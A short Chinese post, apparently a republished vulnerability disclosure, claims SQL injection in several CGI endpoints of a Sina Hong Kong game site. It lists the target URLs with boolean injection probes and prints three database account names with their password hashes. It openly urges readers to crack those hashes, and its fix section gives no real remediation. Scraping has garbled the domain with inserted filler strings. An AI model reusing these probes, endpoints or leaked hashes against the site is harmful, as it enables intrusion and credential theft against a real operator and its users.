由于没有对参数r进行有效的过滤从而导致SQL注入 漏洞 的产生。 具体链接: http://game.sina测试数据.hk/cgi-bin/fl/ring.cgi?r=184626 在r参数的后面添加12345=12345与12345=54321返回的结果是不一样的哦: http://game.sina测试数据.hk/cgi-bin/fl/ring.cgi?r=184626 12345=12345 HdhCmsTest2cto测试数据 http://game.sina测试数据.hk/cgi-bin/fl/ring.cgi?r=184626 12345=54321 除此之外,还有其他链接也存在SQL注入漏洞如下: http://game.sina测试数据.hk/cgi-bin/ja/main.cgi?action=view&id=1 http://game.sina测试数据.hk/cgi-bin/fl/show.cgi?id=11499 http://game.sina测试数据.hk/cgi-bin/fl/tag.cgi?t=新版 http://game.sina测试数据.hk/cgi-bin/nw/main.cgi?cat=470 等等,请sina明察!!! 可获取当前 数据库 版本、当前用户等等信息如下: 还可获取其他更多信息,爆出数据库等账号的哈希,亲们可以去爆破哦: hkgame 7d5a85d7187967a5 web_ro 043ff4215a4b78f9 web_rw 043f16695a4c1b41 修复方案: 你们都懂的 作者 风萧萧
查看更多关于香港新浪SQL注射及修复 - 网站安全 - 自学php的详细内容...